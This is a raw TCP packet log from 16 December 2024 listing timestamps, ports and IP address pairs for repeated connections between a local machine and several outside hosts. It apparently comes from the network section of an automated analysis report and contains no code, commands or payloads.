                                                                                                                                Dec 16, 2024 08:44:34.755496979 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:34.755579948 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:34.755913019 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:34.755940914 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:36.473042965 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:36.473165989 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:36.478487015 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:36.478514910 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:36.478841066 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:36.478916883 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:36.479330063 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:36.527338028 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.238743067 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.238831043 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.251827002 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.251912117 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.358612061 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.358716011 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.358779907 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.358882904 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.362667084 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.362735987 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.430522919 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.430641890 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.434422016 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.434506893 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.434533119 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.434607029 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.440212011 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.440289974 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.448205948 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.449420929 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.449455023 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.449510098 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.457439899 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.461153984 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.461182117 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.464080095 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.466682911 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.469717026 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.474828959 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.477205038 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.478575945 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.478646994 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.488476038 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.488571882 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.491879940 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.491960049 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.502177000 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.505017042 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.505628109 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.505685091 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.530400991 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.532948971 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.533797979 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.537209988 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.537224054 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.537283897 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.540839911 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.541508913 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.543457985 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.543540001 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.550394058 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.553263903 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.557324886 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.557395935 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.557444096 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.557518005 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.570565939 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.573470116 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.573527098 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.573649883 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.584242105 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.584327936 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.622461081 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.622550011 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.622569084 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.622659922 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.625565052 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.625654936 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.625710011 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.625772953 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.630176067 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.630268097 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.633763075 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.633851051 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.633874893 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.633941889 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.645411015 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.645489931 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.645550966 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.645749092 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.645766020 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.645987034 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.656315088 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.656860113 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.656919956 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.656991005 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.667222023 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.669826031 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.669868946 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.669929028 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.677251101 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.678807974 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.678833008 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.678886890 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.687410116 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.687535048 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.687575102 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.687637091 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.697531939 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.697628021 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.697686911 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.697756052 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.707856894 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.707962990 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.708019972 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.708080053 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.717940092 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.718033075 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.718060970 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.718111992 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.728110075 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.728219032 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.728243113 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.728296995 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.737409115 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.737484932 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.737538099 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.737597942 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.746656895 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.746742964 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.746771097 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.746820927 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.755804062 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.755939960 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.755961895 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.756016016 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.764530897 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.764643908 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.764663935 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.764719963 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.764727116 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.764775991 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.765996933 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.766064882 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.766113997 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:39.766253948 CET44349802142.250.181.1192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:39.766319990 CET49802443192.168.2.5142.250.181.1
                                                                                                                                Dec 16, 2024 08:44:40.353423119 CET4981280192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:44:40.473366022 CET8049812158.101.44.242192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:40.473494053 CET4981280192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:44:40.474033117 CET4981280192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:44:40.593760014 CET8049812158.101.44.242192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:41.679105997 CET8049812158.101.44.242192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:41.683551073 CET4981280192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:44:41.803436995 CET8049812158.101.44.242192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:42.057377100 CET8049812158.101.44.242192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:42.104474068 CET4981280192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:44:42.422727108 CET49817443192.168.2.5104.21.67.152
                                                                                                                                Dec 16, 2024 08:44:42.422823906 CET44349817104.21.67.152192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:42.422918081 CET49817443192.168.2.5104.21.67.152
                                                                                                                                Dec 16, 2024 08:44:42.425184965 CET49817443192.168.2.5104.21.67.152
                                                                                                                                Dec 16, 2024 08:44:42.425215960 CET44349817104.21.67.152192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:43.654217005 CET44349817104.21.67.152192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:43.654310942 CET49817443192.168.2.5104.21.67.152
                                                                                                                                Dec 16, 2024 08:44:43.666914940 CET49817443192.168.2.5104.21.67.152
                                                                                                                                Dec 16, 2024 08:44:43.666961908 CET44349817104.21.67.152192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:43.667469025 CET44349817104.21.67.152192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:43.671585083 CET49817443192.168.2.5104.21.67.152
                                                                                                                                Dec 16, 2024 08:44:43.715364933 CET44349817104.21.67.152192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:44.086445093 CET44349817104.21.67.152192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:44.086535931 CET44349817104.21.67.152192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:44.086828947 CET49817443192.168.2.5104.21.67.152
                                                                                                                                Dec 16, 2024 08:44:44.116072893 CET49817443192.168.2.5104.21.67.152
                                                                                                                                Dec 16, 2024 08:44:49.734045029 CET4981280192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:44:49.853914022 CET8049812158.101.44.242192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:50.107709885 CET8049812158.101.44.242192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:50.151400089 CET4981280192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:44:50.253815889 CET49837443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:44:50.253858089 CET44349837149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:50.253952026 CET49837443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:44:50.254537106 CET49837443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:44:50.254549026 CET44349837149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:52.025641918 CET44349837149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:52.025757074 CET49837443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:44:52.028283119 CET49837443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:44:52.028291941 CET44349837149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:52.028635025 CET44349837149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:52.030006886 CET49837443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:44:52.071330070 CET44349837149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:52.071393967 CET49837443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:44:52.071405888 CET44349837149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:52.642225981 CET44349837149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:52.642437935 CET44349837149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:52.642497063 CET49837443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:44:52.642832041 CET49837443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:44:52.812614918 CET4981280192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:44:52.813914061 CET4984480192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:44:52.932749987 CET8049812158.101.44.242192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:52.932802916 CET4981280192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:44:52.934752941 CET8049844158.101.44.242192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:52.934848070 CET4984480192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:44:52.934993982 CET4984480192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:44:53.054811001 CET8049844158.101.44.242192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:54.144963980 CET8049844158.101.44.242192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:54.146260977 CET49846443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:44:54.146294117 CET44349846149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:54.146445036 CET49846443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:44:54.147033930 CET49846443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:44:54.147047043 CET44349846149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:54.198292017 CET4984480192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:44:55.509083033 CET44349846149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:55.511086941 CET49846443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:44:55.511121988 CET44349846149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:55.511174917 CET49846443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:44:55.511188984 CET44349846149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:56.153738976 CET44349846149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:56.153834105 CET44349846149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:56.153906107 CET49846443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:44:56.154582977 CET49846443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:44:56.180176973 CET4985280192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:44:56.299979925 CET8049852158.101.44.242192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:56.300121069 CET4985280192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:44:56.300303936 CET4985280192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:44:56.420012951 CET8049852158.101.44.242192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:57.522845984 CET8049852158.101.44.242192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:57.524162054 CET49857443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:44:57.524192095 CET44349857149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:57.524271011 CET49857443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:44:57.524559021 CET49857443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:44:57.524574995 CET44349857149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:57.573242903 CET4985280192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:44:58.897640944 CET44349857149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:58.899199009 CET49857443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:44:58.899219036 CET44349857149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:58.899266005 CET49857443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:44:58.899272919 CET44349857149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:59.616122007 CET44349857149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:59.616312981 CET44349857149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:59.616415024 CET49857443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:44:59.616700888 CET49857443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:44:59.638027906 CET4985280192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:44:59.639060974 CET4986280192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:44:59.758172035 CET8049852158.101.44.242192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:59.758750916 CET8049862158.101.44.242192.168.2.5
                                                                                                                                Dec 16, 2024 08:44:59.758837938 CET4985280192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:44:59.758886099 CET4986280192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:44:59.758994102 CET4986280192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:44:59.878679037 CET8049862158.101.44.242192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:02.519011021 CET8049862158.101.44.242192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:02.520466089 CET49869443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:02.520564079 CET44349869149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:02.520649910 CET49869443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:02.520900965 CET49869443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:02.520925999 CET44349869149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:02.573277950 CET4986280192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:45:03.888420105 CET44349869149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:03.890209913 CET49869443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:03.890284061 CET44349869149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:03.890357971 CET49869443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:03.890379906 CET44349869149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:04.530669928 CET44349869149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:04.530859947 CET44349869149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:04.530982018 CET49869443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:04.531286955 CET49869443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:04.549926043 CET4986280192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:45:04.551080942 CET4987580192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:45:04.670053959 CET8049862158.101.44.242192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:04.670134068 CET4986280192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:45:04.670825005 CET8049875158.101.44.242192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:04.670907021 CET4987580192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:45:04.671096087 CET4987580192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:45:04.790793896 CET8049875158.101.44.242192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:16.278702021 CET8049875158.101.44.242192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:16.280077934 CET49904443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:16.280168056 CET44349904149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:16.280261040 CET49904443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:16.280517101 CET49904443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:16.280544043 CET44349904149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:16.323451042 CET4987580192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:45:17.681147099 CET44349904149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:17.683304071 CET49904443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:17.683331966 CET44349904149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:17.683406115 CET49904443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:17.683418989 CET44349904149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:18.338711023 CET44349904149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:18.338888884 CET44349904149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:18.338969946 CET49904443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:18.339643002 CET49904443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:18.362782955 CET4987580192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:45:18.364130974 CET4990880192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:45:18.482901096 CET8049875158.101.44.242192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:18.483108044 CET4987580192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:45:18.483969927 CET8049908158.101.44.242192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:18.484044075 CET4990880192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:45:18.484213114 CET4990880192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:45:18.603919983 CET8049908158.101.44.242192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:19.688147068 CET8049908158.101.44.242192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:19.689562082 CET49913443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:19.689599037 CET44349913149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:19.689793110 CET49913443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:19.690129995 CET49913443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:19.690150023 CET44349913149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:19.729559898 CET4990880192.168.2.5158.101.44.242
                                                                                                                                Dec 16, 2024 08:45:21.059452057 CET44349913149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:21.061217070 CET49913443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:21.061244011 CET44349913149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:21.061297894 CET49913443192.168.2.5149.154.167.220
                                                                                                                                Dec 16, 2024 08:45:21.061311007 CET44349913149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:21.678073883 CET44349913149.154.167.220192.168.2.5
                                                                                                                                Dec 16, 2024 08:45:21.678291082 CET44349913149.154.167.220192.168.2.5
